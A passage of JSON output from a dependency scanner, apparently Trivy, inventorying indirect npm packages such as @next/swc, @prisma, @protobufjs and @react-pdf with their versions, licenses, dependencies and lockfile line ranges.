"Identifier": { "PURL": "pkg:npm/%40next/swc-linux-arm64-gnu@14.2.3", "UID": "57fb56d460dbcef9" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1614, "EndLine": 1629 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-linux-arm64-musl@14.2.3", "Name": "@next/swc-linux-arm64-musl", "Identifier": { "PURL": "pkg:npm/%40next/swc-linux-arm64-musl@14.2.3", "UID": "12ede54ae1260d7a" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1630, "EndLine": 1645 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-linux-x64-gnu@14.2.3", "Name": "@next/swc-linux-x64-gnu", "Identifier": { "PURL": "pkg:npm/%40next/swc-linux-x64-gnu@14.2.3", "UID": "36de361f61509fe9" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1646, "EndLine": 1661 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-linux-x64-musl@14.2.3", "Name": "@next/swc-linux-x64-musl", "Identifier": { "PURL": "pkg:npm/%40next/swc-linux-x64-musl@14.2.3", "UID": "d7941c8ea1db7849" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1662, "EndLine": 1677 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-win32-arm64-msvc@14.2.3", "Name": "@next/swc-win32-arm64-msvc", "Identifier": { "PURL": "pkg:npm/%40next/swc-win32-arm64-msvc@14.2.3", "UID": "1cec55188af95ae3" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1678, "EndLine": 1693 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-win32-ia32-msvc@14.2.3", "Name": "@next/swc-win32-ia32-msvc", "Identifier": { "PURL": "pkg:npm/%40next/swc-win32-ia32-msvc@14.2.3", "UID": "3312417dc5f40e95" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1694, "EndLine": 1709 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-win32-x64-msvc@14.2.3", "Name": "@next/swc-win32-x64-msvc", "Identifier": { "PURL": "pkg:npm/%40next/swc-win32-x64-msvc@14.2.3", "UID": "1600c5ccddd71c4b" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1710, "EndLine": 1725 } ], "AnalyzedBy": "npm" }, { "ID": "@noble/ciphers@1.3.0", "Name": "@noble/ciphers", "Identifier": { "PURL": "pkg:npm/%40noble/ciphers@1.3.0", "UID": "32ed4f835393882f" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1726, "EndLine": 1737 } ], "AnalyzedBy": "npm" }, { "ID": "@noble/hashes@1.8.0", "Name": "@noble/hashes", "Identifier": { "PURL": "pkg:npm/%40noble/hashes@1.8.0", "UID": "c4655840c0603060" }, "Version": "1.8.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1738, "EndLine": 1749 } ], "AnalyzedBy": "npm" }, { "ID": "@nodable/entities@2.1.0", "Name": "@nodable/entities", "Identifier": { "PURL": "pkg:npm/%40nodable/entities@2.1.0", "UID": "f66b1c7cc9284b48" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1750, "EndLine": 1762 } ], "AnalyzedBy": "npm" }, { "ID": "@nodelib/fs.scandir@2.1.5", "Name": "@nodelib/fs.scandir", "Identifier": { "PURL": "pkg:npm/%40nodelib/fs.scandir@2.1.5", "UID": "26ec2b4e7979ce37" }, "Version": "2.1.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@nodelib/fs.stat@2.0.5", "run-parallel@1.2.0" ], "Locations": [ { "StartLine": 1763, "EndLine": 1775 } ], "AnalyzedBy": "npm" }, { "ID": "@nodelib/fs.stat@2.0.5", "Name": "@nodelib/fs.stat", "Identifier": { "PURL": "pkg:npm/%40nodelib/fs.stat@2.0.5", "UID": "4d51f4032bd31858" }, "Version": "2.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1776, "EndLine": 1784 } ], "AnalyzedBy": "npm" }, { "ID": "@nodelib/fs.walk@1.2.8", "Name": "@nodelib/fs.walk", "Identifier": { "PURL": "pkg:npm/%40nodelib/fs.walk@1.2.8", "UID": "6b1c595124cb4892" }, "Version": "1.2.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@nodelib/fs.scandir@2.1.5", "fastq@1.20.1" ], "Locations": [ { "StartLine": 1785, "EndLine": 1797 } ], "AnalyzedBy": "npm" }, { "ID": "@one-ini/wasm@0.1.1", "Name": "@one-ini/wasm", "Identifier": { "PURL": "pkg:npm/%40one-ini/wasm@0.1.1", "UID": "e8733f7b850cc5a6" }, "Version": "0.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1798, "EndLine": 1803 } ], "AnalyzedBy": "npm" }, { "ID": "@opentelemetry/api@1.9.1", "Name": "@opentelemetry/api", "Identifier": { "PURL": "pkg:npm/%40opentelemetry/api@1.9.1", "UID": "2772060db60892c5" }, "Version": "1.9.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1804, "EndLine": 1813 } ], "AnalyzedBy": "npm" }, { "ID": "@otplib/core@12.0.1", "Name": "@otplib/core", "Identifier": { "PURL": "pkg:npm/%40otplib/core@12.0.1", "UID": "af65b9260cf60878" }, "Version": "12.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1814, "EndLine": 1819 } ], "AnalyzedBy": "npm" }, { "ID": "@otplib/plugin-crypto@12.0.1", "Name": "@otplib/plugin-crypto", "Identifier": { "PURL": "pkg:npm/%40otplib/plugin-crypto@12.0.1", "UID": "bea68803c96e08e0" }, "Version": "12.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@otplib/core@12.0.1" ], "Locations": [ { "StartLine": 1820, "EndLine": 1829 } ], "AnalyzedBy": "npm" }, { "ID": "@otplib/plugin-thirty-two@12.0.1", "Name": "@otplib/plugin-thirty-two", "Identifier": { "PURL": "pkg:npm/%40otplib/plugin-thirty-two@12.0.1", "UID": "95f75ff383f419c6" }, "Version": "12.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@otplib/core@12.0.1", "thirty-two@1.0.2" ], "Locations": [ { "StartLine": 1830, "EndLine": 1840 } ], "AnalyzedBy": "npm" }, { "ID": "@otplib/preset-default@12.0.1", "Name": "@otplib/preset-default", "Identifier": { "PURL": "pkg:npm/%40otplib/preset-default@12.0.1", "UID": "831ed3d5651f5c89" }, "Version": "12.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@otplib/core@12.0.1", "@otplib/plugin-crypto@12.0.1", "@otplib/plugin-thirty-two@12.0.1" ], "Locations": [ { "StartLine": 1841, "EndLine": 1852 } ], "AnalyzedBy": "npm" }, { "ID": "@otplib/preset-v11@12.0.1", "Name": "@otplib/preset-v11", "Identifier": { "PURL": "pkg:npm/%40otplib/preset-v11@12.0.1", "UID": "847748d8bc8053d5" }, "Version": "12.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@otplib/core@12.0.1", "@otplib/plugin-crypto@12.0.1", "@otplib/plugin-thirty-two@12.0.1" ], "Locations": [ { "StartLine": 1853, "EndLine": 1863 } ], "AnalyzedBy": "npm" }, { "ID": "@pkgjs/parseargs@0.11.0", "Name": "@pkgjs/parseargs", "Identifier": { "PURL": "pkg:npm/%40pkgjs/parseargs@0.11.0", "UID": "d535e30aaa4879aa" }, "Version": "0.11.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1874, "EndLine": 1883 } ], "AnalyzedBy": "npm" }, { "ID": "@prisma/client@5.22.0", "Name": "@prisma/client", "Identifier": { "PURL": "pkg:npm/%40prisma/client@5.22.0", "UID": "36b2dc760a0e2471" }, "Version": "5.22.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "prisma@5.22.0" ], "Locations": [ { "StartLine": 1884, "EndLine": 1901 } ], "AnalyzedBy": "npm" }, { "ID": "@prisma/debug@5.22.0", "Name": "@prisma/debug", "Identifier": { "PURL": "pkg:npm/%40prisma/debug@5.22.0", "UID": "3421bf7d5a357f11" }, "Version": "5.22.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1902, "EndLine": 1908 } ], "AnalyzedBy": "npm" }, { "ID": "@prisma/engines@5.22.0", "Name": "@prisma/engines", "Identifier": { "PURL": "pkg:npm/%40prisma/engines@5.22.0", "UID": "6aad7f35bd92cfb0" }, "Version": "5.22.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@prisma/debug@5.22.0", "@prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", "@prisma/fetch-engine@5.22.0", "@prisma/get-platform@5.22.0" ], "Locations": [ { "StartLine": 1909, "EndLine": 1922 } ], "AnalyzedBy": "npm" }, { "ID": "@prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", "Name": "@prisma/engines-version", "Identifier": { "PURL": "pkg:npm/%40prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", "UID": "b15d584fa6796769" }, "Version": "5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1923, "EndLine": 1929 } ], "AnalyzedBy": "npm" }, { "ID": "@prisma/fetch-engine@5.22.0", "Name": "@prisma/fetch-engine", "Identifier": { "PURL": "pkg:npm/%40prisma/fetch-engine@5.22.0", "UID": "90f07b58f9429522" }, "Version": "5.22.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@prisma/debug@5.22.0", "@prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", "@prisma/get-platform@5.22.0" ], "Locations": [ { "StartLine": 1930, "EndLine": 1941 } ], "AnalyzedBy": "npm" }, { "ID": "@prisma/get-platform@5.22.0", "Name": "@prisma/get-platform", "Identifier": { "PURL": "pkg:npm/%40prisma/get-platform@5.22.0", "UID": "249137849e1d198f" }, "Version": "5.22.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@prisma/debug@5.22.0" ], "Locations": [ { "StartLine": 1942, "EndLine": 1951 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/aspromise@1.1.2", "Name": "@protobufjs/aspromise", "Identifier": { "PURL": "pkg:npm/%40protobufjs/aspromise@1.1.2", "UID": "31a08bba737741cb" }, "Version": "1.1.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1952, "EndLine": 1958 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/base64@1.1.2", "Name": "@protobufjs/base64", "Identifier": { "PURL": "pkg:npm/%40protobufjs/base64@1.1.2", "UID": "f0dcdf01fce2bb2d" }, "Version": "1.1.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1959, "EndLine": 1965 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/codegen@2.0.5", "Name": "@protobufjs/codegen", "Identifier": { "PURL": "pkg:npm/%40protobufjs/codegen@2.0.5", "UID": "4034a3bd9bda0f9f" }, "Version": "2.0.5", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1966, "EndLine": 1972 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/eventemitter@1.1.0", "Name": "@protobufjs/eventemitter", "Identifier": { "PURL": "pkg:npm/%40protobufjs/eventemitter@1.1.0", "UID": "90e792ab41b76f36" }, "Version": "1.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1973, "EndLine": 1979 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/fetch@1.1.0", "Name": "@protobufjs/fetch", "Identifier": { "PURL": "pkg:npm/%40protobufjs/fetch@1.1.0", "UID": "bc7ec50f9652ac" }, "Version": "1.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@protobufjs/aspromise@1.1.2", "@protobufjs/inquire@1.1.1" ], "Locations": [ { "StartLine": 1980, "EndLine": 1990 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/float@1.0.2", "Name": "@protobufjs/float", "Identifier": { "PURL": "pkg:npm/%40protobufjs/float@1.0.2", "UID": "a6c52bc05c4a1112" }, "Version": "1.0.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1991, "EndLine": 1997 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/inquire@1.1.1", "Name": "@protobufjs/inquire", "Identifier": { "PURL": "pkg:npm/%40protobufjs/inquire@1.1.1", "UID": "bc5a1aa6ad1fb5b5" }, "Version": "1.1.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1998, "EndLine": 2004 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/path@1.1.2", "Name": "@protobufjs/path", "Identifier": { "PURL": "pkg:npm/%40protobufjs/path@1.1.2", "UID": "a8f0e471cd1f7df2" }, "Version": "1.1.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2005, "EndLine": 2011 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/pool@1.1.0", "Name": "@protobufjs/pool", "Identifier": { "PURL": "pkg:npm/%40protobufjs/pool@1.1.0", "UID": "eab8a54cd8019604" }, "Version": "1.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2012, "EndLine": 2018 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/utf8@1.1.1", "Name": "@protobufjs/utf8", "Identifier": { "PURL": "pkg:npm/%40protobufjs/utf8@1.1.1", "UID": "60e45b16f3dd0534" }, "Version": "1.1.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2019, "EndLine": 2025 } ], "AnalyzedBy": "npm" }, { "ID": "@react-email/render@0.0.16", "Name": "@react-email/render", "Identifier": { "PURL": "pkg:npm/%40react-email/render@0.0.16", "UID": "81c9e4162c4399ac" }, "Version": "0.0.16", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "html-to-text@9.0.5", "js-beautify@1.15.4", "react-dom@18.3.1", "react-promise-suspense@0.3.4", "react@18.3.1" ], "Locations": [ { "StartLine": 2026, "EndLine": 2043 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/fns@2.2.1", "Name": "@react-pdf/fns", "Identifier": { "PURL": "pkg:npm/%40react-pdf/fns@2.2.1", "UID": "b1b7e910e0154ace" }, "Version": "2.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2" ], "Locations": [ { "StartLine": 2044, "EndLine": 2052 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/fns@3.1.3", "Name": "@react-pdf/fns", "Identifier": { "PURL": "pkg:npm/%40react-pdf/fns@3.1.3", "UID": "86552e3380174ba7" }, "Version": "3.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2208, "EndLine": 2213 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/font@2.5.2", "Name": "@react-pdf/font", "Identifier": { "PURL": "pkg:npm/%40react-pdf/font@2.5.2", "UID": "1048755b16ff4784" }, "Version": "2.5.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@react-pdf/types@2.11.1", "cross-fetch@3.2.0", "fontkit@2.0.4", "is-url@1.2.4" ], "Locations": [ { "StartLine": 2053, "EndLine": 2065 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/font@4.0.8", "Name": "@react-pdf/font", "Identifier": { "PURL": "pkg:npm/%40react-pdf/font@4.0.8", "UID": "e436de349a8de1a5" }, "Version": "4.0.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-pdf/pdfkit@5.1.1", "@react-pdf/types@2.11.1", "fontkit@2.0.4", "is-url@1.2.4" ], "Locations": [ { "StartLine": 2214, "EndLine": 2225 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/image@2.3.6", "Name": "@react-pdf/image", "Identifier": { "PURL": "pkg:npm/%40react-pdf/image@2.3.6", "UID": "1611f37c76ad50bb" }, "Version": "2.3.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@react-pdf/png-js@2.3.1", "cross-fetch@3.2.0", "jay-peg@1.1.1" ], "Locations": [ { "StartLine": 2066, "EndLine": 2077 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/layout@3.13.0", "Name": "@react-pdf/layout", "Identifier": { "PURL": "pkg:npm/%40react-pdf/layout@3.13.0", "UID": "1ec2dcd7f2103fb9" }, "Version": "3.13.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@react-pdf/fns@2.2.1", "@react-pdf/image@2.3.6", "@react-pdf/pdfkit@3.2.0", "@react-pdf/primitives@3.1.1", "@react-pdf/stylesheet@4.3.0", "@react-pdf/textkit@4.4.1", "@react-pdf/types@2.11.1", "cross-fetch@3.2.0", "emoji-regex@10.6.0", "queue@6.0.2", "yoga-layout@2.0.1" ], "Locations": [ { "StartLine": 2078, "EndLine": 2097 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/pdfkit@3.2.0", "Name": "@react-pdf/pdfkit", "Identifier": { "PURL": "pkg:npm/%40react-pdf/pdfkit@3.2.0", "UID": "d0c0c93c9d1e276f" }, "Version": "3.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@react-pdf/png-js@2.3.1", "browserify-zlib@0.2.0", "crypto-js@4.2.0", "fontkit@2.0.4", "jay-peg@1.1.1", "vite-compatible-readable-stream@3.6.1" ], "Locations": [ { "StartLine": 2098, "EndLine": 2112 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/pdfkit@5.1.1", "Name": "@react-pdf/pdfkit", "Identifier": { "PURL": "pkg:npm/%40react-pdf/pdfkit@5.1.1", "UID": "9596f15d079bb88c" }, "Version": "5.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@noble/ciphers@1.3.0", "@noble/hashes@1.8.0", "browserify-zlib@0.2.0", "fontkit@2.0.4", "jay-peg@1.1.1", "js-md5@0.8.3", "linebreak@1.1.0", "png-js@2.0.0", "vite-compatible-readable-stream@3.6.1" ], "Locations": [ { "StartLine": 2226, "EndLine": 2243 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/png-js@2.3.1", "Name": "@react-pdf/png-js", "Identifier": { "PURL": "pkg:npm/%40react-pdf/png-js@2.3.1", "UID": "554683a69749d63c" }, "Version": "2.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "browserify-zlib@0.2.0" ], "Locations": [ { "StartLine": 2113, "EndLine": 2121 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/primitives@3.1.1", "Name": "@react-pdf/primitives", "Identifier": { "PURL": "pkg:npm/%40react-pdf/primitives@3.1.1", "UID": "9c3467cbe48a9082" }, "Version": "3.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2122, "EndLine": 2127 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/primitives@4.3.0", "Name": "@react-pdf/primitives", "Identifier": { "PURL": "pkg:npm/%40react-pdf/primitives@4.3.0", "UID": "cdaf28bf8d266565" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2244, "EndLine": 2249 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/render@3.5.0", "Name": "@react-pdf/render", "Identifier": { "PURL": "pkg:npm/%40react-pdf/render@3.5.0", "UID": "ffc618db4703c64c" }, "Version": "3.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@react-pdf/fns@2.2.1", "@react-pdf/primitives@3.1.1", "@react-pdf/textkit@4.4.1", "@react-pdf/types@2.11.1", "abs-svg-path@0.1.1", "color-string@1.9.1", "normalize-svg-path@1.1.0", "parse-svg-path@0.1.2", "svg-arc-to-cubic-bezier@3.2.0" ], "Locations": [ { "StartLine": 2128, "EndLine": 2145 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/renderer@3.4.5", "Name": "@react-pdf/renderer", "Identifier": { "PURL": "pkg:npm/%40react-pdf/renderer@3.4.5", "UID": "1dec2b02cb96569b" }, "Version": "3.4.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@react-pdf/font@2.5.2", "@react-pdf/layout@3.13.0", "@react-pdf/pdfkit@3.2.0", "@react-pdf/primitives@3.1.1", "@react-pdf/render@3.5.0", "@react-pdf/types@2.11.1", "events@3.3.0", "object-assign@4.1.1", "prop-types@15.8.1", "queue@6.0.2", "react@18.3.1", "scheduler@0.17.0" ], "Locations": [ { "StartLine": 2146, "EndLine": 2168 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/stylesheet@4.3.0", "Name": "@react-pdf/stylesheet", "Identifier": { "PURL": "pkg:npm/%40react-pdf/stylesheet@4.3.0", "UID": "aa5b364876aac4d8" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@react-pdf/fns@2.2.1", "@react-pdf/types@2.11.1", "color-string@1.9.1", "hsl-to-hex@1.0.0", "media-engine@1.0.3", "postcss-value-parser@4.2.0" ], "Locations": [ { "StartLine": 2169, "EndLine": 2183 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/stylesheet@6.2.1", "Name": "@react-pdf/stylesheet", "Identifier": { "PURL": "pkg:npm/%40react-pdf/stylesheet@6.2.1", "UID": "5f053e51595fa3ee" }, "Version": "6.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-pdf/fns@3.1.3", "@react-pdf/types@2.11.1", "color-string@2.1.4", "hsl-to-hex@1.0.0", "media-engine@1.0.3", "postcss-value-parser@4.2.0" ], "Locations": [ { "StartLine": 2250, "EndLine": 2263 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/textkit@4.4.1", "Name": "@react-pdf/textkit", "Identifier": { "PURL": "pkg:npm/%40react-pdf/textkit@4.4.1", "UID": "61bdde0a67736b0d" }, "Version": "4.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "@react-pdf/fns@2.2.1", "bidi-js@1.0.3", "hyphen@1.14.1", "unicode-properties@1.4.1" ], "Locations": [ { "StartLine": 2184, "EndLine": 2196 } ], "AnalyzedBy": "npm" }, { "ID": "@react-pdf/types@2.11.1", "Name": "@react-pdf/types", "Identifier": { "PURL": "pkg:npm/%40react-pdf/types@2.11.1", "UID": "b09681ce0866466e" }, "Version": "2.11.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-pdf/font@4.0.8", "@react-pdf/primitives@4.3.0", "@react-pdf/stylesheet@6.2.1" ], "Locations": [ { "StartLine": 2197, "EndLine": 2207 } ], "AnalyzedBy": "npm" }, { "ID": "@scarf/scarf@1.4.0", "Name": "@scarf/scarf", "Identifier": { "PURL": "pkg:npm/%40scarf/scarf@1.4.0", "UID": "479be900c39fe49c" }, "Version": "1.4.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2698, "EndLine": 2704 } ], "AnalyzedBy": "npm" }, { "ID": "@selderee/plugin-htmlparser2@0.11.0", "Name": "@selderee/plugin-htmlparser2", "Identifier": { "PURL": "pkg:npm/%40selderee/plugin-htmlparser2@0.11.0", "UID": "b04b932da6ff5ffb" }, "Version": "0.11.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "domhandler@5.0.3", "selderee@0.11.0" ], "Locations": [ { "StartLine": 2705, "EndLine": 2717 } ], "AnalyzedBy": "npm" }, { "ID": "@socket.io/component-emitter@3.1.2", "Name": "@socket.io/component-emitter", "Identifier": { "PURL": "pkg:npm/%40socket.io/component-emitter@3.1.2", "UID": "567ffcfd9fd1defb" }, "Version": "3.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2725, "EndLine": 2730 } ], "AnalyzedBy": "npm" }, { "ID": "@swc/counter@0.1.3", "Name": "@swc/counter", "Identifier": { "PURL": "pkg:npm/%40swc/counter@0.1.3", "UID": "dd7b4996459b61a6" }, "Version": "0.1.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2731, "EndLine": 2736 } ], "AnalyzedBy": "npm" }, { "ID": "@swc/helpers@0.5.21", "Name": "@swc/helpers", "Identifier": { "PURL": "pkg:npm/%40swc/helpers@0.5.21", "UID": "3eb7e21444fcb00" }, "Version": "0.5.21", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tslib@2.8.1" ], "Locations": [ { "StartLine": 2737, "EndLine": 2745 } ], "AnalyzedBy": "npm" }, { "ID": "@swc/helpers@0.5.5", "Name": "@swc/helpers", "Identifier": { "PURL": "pkg:npm/%40swc/helpers@0.5.5", "UID": "c1fe0c8e385f5c7e" }, "Version": "0.5.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@swc/counter@0.1.3", "tslib@2.4.1" ], "Locations": [ { "StartLine": 7302, "EndLine": 7311 } ], "AnalyzedBy": "npm" }, { "ID": "@tootallnate/once@2.0.0", "Name": "@tootallnate/once", "Identifier": { "PURL": "pkg:npm/%40tootallnate/once@2.0.0", "UID": "daf7aed08211b13b" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2752, "EndLine": 2761 } ], "AnalyzedBy": "npm" }, { "ID": "@types/caseless@0.12.5", "Name": "@types/caseless", "Identifier": { "PURL": "pkg:npm/%40types/caseless@0.12.5", "UID": "705d3cd7ba5175df" }, "Version": "0.12.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2808, "EndLine": 2814 } ], "AnalyzedBy": "npm" }, { "ID": "@types/cors@2.8.19", "Name": "@types/cors", "Identifier": { "PURL": "pkg:npm/%40types/cors@2.8.19", "UID": "53ecc16557ef2244" }, "Version": "2.8.19", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/node@20.19.39" ], "Locations": [ { "StartLine": 2832, "EndLine": 2840 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-array@3.2.2", "Name": "@types/d3-array", "Identifier": { "PURL": "pkg:npm/%40types/d3-array@3.2.2", "UID": "eca5d81e0b42ae57" }, "Version": "3.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2841, "EndLine": 2846 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-color@3.1.3", "Name": "@types/d3-color", "Identifier": { "PURL": "pkg:npm/%40types/d3-color@3.1.3", "UID": "b9e20e3f3c58b255" }, "Version": "3.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2847, "EndLine": 2852 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-ease@3.0.2", "Name": "@types/d3-ease", "Identifier": { "PURL": "pkg:npm/%40types/d3-ease@3.0.2", "UID": "3ca5cfe9356d50f7" }, "Version": "3.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2853, "EndLine": 2858 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-interpolate@3.0.4", "Name": "@types/d3-interpolate", "Identifier": { "PURL": "pkg:npm/%40types/d3-interpolate@3.0.4", 